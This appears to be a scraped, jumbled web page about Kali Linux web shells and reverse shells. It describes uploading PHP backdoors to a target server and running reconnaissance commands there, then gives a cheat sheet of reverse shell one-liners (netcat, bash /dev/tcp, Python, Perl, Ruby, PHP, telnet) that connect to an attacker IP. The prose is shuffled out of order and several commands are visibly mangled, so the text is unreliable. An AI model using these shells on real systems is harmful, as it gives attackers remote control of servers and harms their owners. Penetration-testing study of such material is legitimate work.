In order for this shell to make a reverse connection, it needs an IP address. As its name says, it makes a reverse connection to our attacker system. In fact we can make the webserver visit us. We can also connect to the database.Įvery shell doesn’t require us to visit the web server. As you can see below, it has upload form and a function to execute commands.
![how to save a file in a netcat reverse shell how to save a file in a netcat reverse shell](https://miro.medium.com/max/740/1*oQnd8jfV_aeThfvPE4r2kw.png)
I works akin to file upload function in our Part 1. It helps us in the case where we can’t easily upload any additional files we want. The php-backdoor, as the name implies is file upload shell just used to add more backdoors. Similarly let us execute another powerful command “systeminfo” to get the web server’s whole information as shown below. As already used in Part 1, this command gives us all the users present on the Window’s system. Let us go to the shell’s link after uploading and execute the “net user” command as shown below. It is used to execute some commands on the target web server.
HOW TO SAVE A FILE IN A NETCAT REVERSE SHELL HOW TO
See how to upload the shells.Īs the name clearly tells, the functioning of this shell is very simple. Now let us see their features by uploading each one them into web server we want to hack. So go into that directory and do an “ls”.
![how to save a file in a netcat reverse shell how to save a file in a netcat reverse shell](https://z9fr.github.io/images/edited-index.php_.png)
As you can see, web shells are classified according to the language of the website we are trying to hack. Open a terminal and navigate to the directory “/usr/share/webshells” as shown below.
![how to save a file in a netcat reverse shell how to save a file in a netcat reverse shell](https://1.bp.blogspot.com/-9mlsPE769UI/YDelK1Xw4_I/AAAAAAAAuLw/fbcP5-au4P815J13NUVwxEIm3wOX1Yc1wCLcBGAsYHQ/s16000/11.png)
It would be very disappointing if it didn’t have web shells in its arsenal. So today we will see some of the least popular but still effective web shells.Īs you all know, Kali Linux is one of the best pen testing distros available. Although it is unlikely that web servers will be installed with antivirus, still it is good to stay one step ahead. Any common antivirus will easily detect it as malware. The C99 php shell is very well known among the antivirus. However popularity has its own disadvantages, at the least in the field of cyber security. In a previous article, we saw how one of the most popular shells can be used to hack a website.
![how to save a file in a netcat reverse shell how to save a file in a netcat reverse shell](https://thehacktoday.com/wp-content/uploads/2016/12/1.png)
In this howto, we will learn about Webshells provided by default in Kali Linux. The following shells exist within Kali Linux, under /usr/share/webshells/ these are only useful if you are able to upload, inject or transfer the shell to the machine.Hello Aspiring Hackers. waitFor () Python Reverse Shell python - c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("ATTACKING-IP",80)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() ' Gawk Reverse Shell #!/usr/bin/gawk -f Perl Reverse Shell perl - e 'use Socket $i="ATTACKING-IP" $p=80 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))) ' Ruby Reverse Shell ruby - rsocket - e 'f=TCPSocket.open("ATTACKING-IP",80).to_i exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)' Java Reverse Shell r = Runtime. Remember to listen on 443 on the attacking machine also. If it doesn 't work, try 4,5, or 6) Netcat Reverse Shell nc -e /bin/sh ATTACKING-IP 80 /bin/sh | nc ATTACKING-IP 80 rm -f /tmp/p mknod /tmp/p p & nc ATTACKING-IP 4444 0/tmp/p Telnet Reverse Shell rm -f /tmp/p mknod /tmp/p p & telnet ATTACKING-IP 80 0/tmp/p telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 Bash Reverse Shells exec /bin/bash 0&0 2>&0 0/dev/tcp/ATTACKING-IP/80 sh &196 2>&196 exec 5/dev/tcp/ATTACKING-IP/80Ĭat &5 >&5 done # or: while read line 0&5 >&5 done bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 PHP Reverse Shell php -r '$sock=fsockopen("ATTACKING-IP",80) exec("/bin/sh -i &3 2>&3") ' (Assumes TCP uses file descriptor 3. If you’re attacking machine is behing a NAT router, you’ll need to setup a port forward to the attacking machines IP / Port.ĪTTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).